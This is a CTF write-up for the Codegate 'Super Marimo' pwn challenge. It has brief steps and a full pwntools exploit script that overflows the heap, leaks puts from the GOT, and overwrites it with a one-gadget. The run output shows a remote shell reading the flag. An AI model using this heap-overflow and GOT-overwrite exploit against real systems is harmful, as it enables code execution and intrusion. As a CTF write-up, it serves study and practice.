CTFtime.org

SuperMarimo

by 8710xiq / PwnaSonic

Rating:

## === Super Marimo (Pwn: 61 solves / 375 pts) ===

1. Get marimo with "show me the marimo" command.
2. Heap area can be overwritten with Profile of View command.
3. Leak puts() address of GOT.
4. Change One-gadget address from puts() address of GOT.
5. Although libc is not given, it can be searched at the following URL.
https://libc.blukat.me/

```
from pwn import *

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './marimo'
elf = ELF(BINARY)

puts_got_addr = elf.got['puts']

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = remote("ch41l3ng3s.codegate.kr", 3333)
puts_offset_addr = 0x06f690
one_gadget_offset = 0x45216
else:
s = process(BINARY)
libc = elf.libc
puts_offset_addr = libc.symbols['puts']
one_gadget_offset = 0x41bce

def Show(name, profile):
s.recvuntil(">> ")
s.sendline("show me the marimo")
s.recvuntil(">> ")
s.sendline(name)
s.recvuntil(">> ")
s.sendline(profile)

def View_Modify(num, profile):
s.recvuntil(">> ")
s.sendline("V")
s.recvuntil(">> ")
s.sendline(str(num))
s.recvuntil(">> ")
s.sendline("M")
s.recvuntil(">> ")
s.sendline(profile)
s.recvuntil(">> ")
s.sendline("B")

def View(num):
s.recvuntil(">> ")
s.sendline("V")
s.recvuntil(">> ")
s.sendline(str(num))

def Buy(num, play):
s.recvuntil(">> ")
s.sendline("B")
s.recvuntil(">> ")
s.sendline(str(num))
s.recvuntil(">> ")
input()
s.sendline(play)

def Sell(num, sell):
s.recvuntil(">> ")
s.sendline("S")
s.recvuntil(">> ")
s.sendline(str(num))
s.recvuntil("[S]ell / [R]un away ?")
s.sendline(sell)

Show("1", "1")
Show("2", "2")

sleep(5)
buf = "3"*0x28 + p64(0x21) + p64(0x15a765161)
buf += p64(puts_got_addr) + p64(puts_got_addr)
View_Modify(0, buf)

View(1)
s.recvuntil("name : ")
r = s.recv(6)

puts_addr = u64(r[0:6].ljust(8, '\x00'))
libc_base_addr = puts_addr - puts_offset_addr
one_gadget_addr = libc_base_addr + one_gadget_offset
print "puts_addr =", hex(puts_addr)
print "libc_base_addr =", hex(libc_base_addr)
print "one_gadget_addr =", hex(one_gadget_addr)

s.recvuntil(">> ")
s.sendline("B")

s.recvuntil(">> ")
s.sendline("V")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.sendline("M")
s.recvuntil(">> ")
s.sendline(p64(one_gadget_addr))

s.interactive()
```

```
root@kali:~/Pwn_Super_Marimo# python exploit.py r
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to ch41l3ng3s.codegate.kr on port 3333: Done
puts_addr = 0x7fb3ef02d690
libc_base_addr = 0x7fb3eefbe000
one_gadget_addr = 0x7fb3ef003216
[*] Switching to interactive mode
$ id
uid=1000(marimo) gid=1000(marimo) groups=1000(marimo)
$ ls
flag
marimo
$ cat flag
But_every_cat_is_more_cute_than_Marimo
```

Comments